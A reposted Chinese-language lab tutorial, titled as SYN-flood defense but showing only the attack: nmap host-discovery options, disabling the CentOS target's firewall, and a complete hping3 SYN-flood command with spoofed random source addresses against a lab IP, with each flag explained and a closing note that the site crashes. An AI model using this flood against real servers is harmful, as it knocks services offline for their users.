DDOS 攻击防御-SYN 洪水攻击

DDOS 攻击防御-SYN 洪水攻击本文章仅供学习交流一 环境配置攻击机 kali2021 1ip 192 168 0 255 255 0 靶机 contos7 6ip 192 168 0 255 255 0 条件 两机器要在同一局域网中 能相互访问 contos 开启 apche 服务二 信息收集 1 Traceroute 命令也可以对路由进行跟踪 2 使用 nmap 扫描 win7 进行信息收集 nmap 目标 ipexclude 排除目标 ip 扫描时排除指定 ipnmap iL 目标文

本文章仅供学习交流

一.环境配置

二.信息收集
1.Traceroute 命令也可以对路由进行跟踪

在这里插入图片描述
2.使用nmap扫描win7进行信息收集

nmap 目标ip --exclude 排除目标ip 扫描时排除指定ip nmap -iL 目标文件 扫描指定文件夹的ip nmap -iR 目标数量 随机扫描指定iP数量 nmap -sn 目标 只探测主机是否存活,不对端口和其他信息进行扫描 nmap -sn -PR 目标 通过ARP协议扫描主机是否存活 nmap -PE 目标 过程上和ping命令无异 nmap -PP 目标 通过ICMP协议的时间戳的方式发现主机是否存活 nmap -PM 目标 通过ICMP协议的地址掩码发现主机 nmap -PS [端口,端口,端口...] 目标 通过TCP协议来扫描主机是否存活(全连接扫描) nmap -PU 目标 通过UDP方式扫描 nmap --data-length 25 目标 通过参数--data--length 25 来发生随机数据包 nmap --packet-trace 目标 追踪nmap发送的数据包 
systemctl start httpd //开启apache服务 systemctl stop firewalld.service //关闭防火墙 

在这里插入图片描述

2.启动kali使用hping命令对靶机进行压力测试

 ┌──(root?kali)-[~/桌面] └─# hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.0.120 -c 1000 = 发送的数据包的数量。 -d 120 = 发送到目标机器的每个数据包的大小。单位是字节 -S = 只发送 SYN 数据包。 -w 64 = TCP 窗口大小。 -p 80 = 目的地端口(80 是 WEB 端口)。你在这里可以使用任何端口。 --flood = 尽可能快地发送数据包,不需要考虑显示入站回复。洪水攻击模式。 --rand-source = 使用随机性的源头 IP 地址。这里的伪造的 IP 地址,只是在局域中伪造。通过路 由器后,还会还原成真实的 IP 地址。 

3.重新访问网站,发现网站变慢了,当我们把-c的数据改大些的时候过一会就会发现网站被干崩了,就达到了我SYN洪水攻击的目的了。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/209332.html原文链接:https://javaforall.net

(0)
上一篇 2026年3月19日 上午9:29
下一篇 2026年3月19日 上午9:30


相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号